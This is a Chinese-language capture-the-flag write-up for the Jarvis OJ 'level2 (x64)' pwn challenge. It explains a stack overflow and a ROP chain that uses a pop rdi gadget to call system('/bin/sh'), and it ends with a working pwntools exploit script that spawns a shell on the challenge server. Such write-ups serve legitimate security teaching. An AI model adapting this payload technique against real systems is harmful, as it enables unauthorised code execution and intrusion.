(Jarvis Oj)(Pwn) level2(x64)

(Jarvis Oj)(Pwn) level2(x64)

首先用checksec查一下保护,和level2一样。
(Jarvis Oj)(Pwn) level2(x64)_第1张图片
反汇编,程序和32位的程序几乎一致。找到溢出点。
(Jarvis Oj)(Pwn) level2(x64)_第2张图片
那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可以做到,利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi,在执行pop语句时,只要保证栈顶元素是”/bin/sh”的地址,并将返回地址设置为system。示意图如下:
(Jarvis Oj)(Pwn) level2(x64)_第3张图片
通过ropgadget去找pop edi;ret的地址。
这里写图片描述
最后写得脚本。

  1 from pwn import *                                                                                                  
  2 conn=remote("pwn2.jarvisoj.com","9882")
  3 #conn=process("./level2x64")
  4 e=ELF("./level2x64")
  5 sys_addr=e.symbols['system']
  6 pad=0x80
  7 pop_rdi_addr=0x4006b3
  8 sh_addr=e.search("/bin/sh").next()
  9 payload="A"*pad+"BBBBBBBB"+p64(pop_rdi_addr)+p64(sh_addr)+p64(sys_addr)
 10 conn.sendline(payload)
 11 conn.interactive();

你可能感兴趣的:(pwn)